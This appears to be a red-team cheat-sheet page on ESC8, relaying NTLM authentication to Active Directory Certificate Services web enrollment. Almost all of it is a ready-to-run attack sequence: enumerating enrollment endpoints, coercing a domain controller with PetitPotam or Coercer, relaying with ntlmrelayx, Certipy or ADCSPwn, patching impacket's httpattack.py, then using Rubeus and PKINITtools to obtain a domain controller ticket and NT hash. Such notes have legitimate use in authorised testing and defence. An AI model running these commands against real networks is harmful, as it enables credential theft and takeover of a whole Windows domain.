ESC8
NTLM Relay to AD CS HTTP Endpoints

Enumerate

Discover CES endpoints with certutil:
Cmd > certutil.exe -enrollmentServerURL -config CA01.megacorp.local\CA01
Discover CES endpoints with PowerShell:
PS > Get-CertificationAuthority | select name,enroll* | fl

Exploit

ntlmrelayx

$ sudo ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --no-wcf-server --adcs [--template VulnTemplate]
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
PS > .\Rubeus.exe asktgt /user:DC1$ /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt

PKINITtools

Backup original httpattack.py and copy one from the toolkit with a modified domain name and a template if needed (DomainController is by default, but also one may use KerberosAuthentication):
$ sudo cp /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py.bak
$ subl ntlmrelayx/httpattack.py
$ sudo cp ntlmrelayx/httpattack.py /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py
Perform the relay attack, request the TGT via PKINIT and get the NT hash based on U2U Kerberos extension:
$ sudo ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --no-wcf-server
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
$ python3 gettgtpkinit.py megacorp.local/'DC1#x27; -cert-pem cert.pem -key-pem privatekey.pem dc1.ccache
$ KRB5CCNAME=dc1.ccache python3 getnthash.py megacorp.local/'DC1#x27; -key 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
Revert the original httpattack.py:
$ sudo mv /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py.bak /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py

Certipy

Prepare for the relay attack:
$ certipy relay -ca 192.168.1.11 -template DomainController

ADCSPwn

Start a relay server:
PS > .\ADCSPwn.exe --adcs CA01.megacorp.local
Coerce the authentication, e. g. via Coercer:
$ coercer -u snovvcrash -p 'Passw0rd!' -wh VICTIM01 -wp 8080 -t 192.168.1.11
Last modified 7d ago